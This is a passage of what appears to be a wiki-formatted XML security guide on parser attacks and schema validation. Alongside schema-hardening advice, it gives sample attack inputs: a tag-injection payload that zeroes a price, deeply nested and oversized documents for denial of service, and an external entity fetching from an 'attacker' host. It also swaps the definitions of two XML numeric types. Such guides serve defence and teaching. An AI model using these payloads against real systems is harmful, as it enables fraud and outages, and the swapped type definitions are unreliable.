Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;11111..(1.000.000digits)..11111&amp;lt;/age&amp;gt;&lt;br /&gt;
&amp;lt;/person&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element name='CipherData' type='xenc:CipherDataType'/&amp;gt;&lt;br /&gt;
&amp;lt;complexType name='CipherDataType'&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name='CipherValue' type='base64Binary'/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref='xenc:CipherReference'/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
&amp;lt;/complexType&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* negativeInteger: Only negative numbers&lt;br /&gt;
* nonNegativeInteger: Negative numbers and the zero value&lt;br /&gt;
* positiveInteger: Only positive numbers&lt;br /&gt;
* nonPositiveInteger: Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values Infinity and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type decimal is recommended:&lt;br /&gt;
&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
Code Sample 23: An XML Schema providing a set of restrictions over the document on Code 18&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
•	Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
•	Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
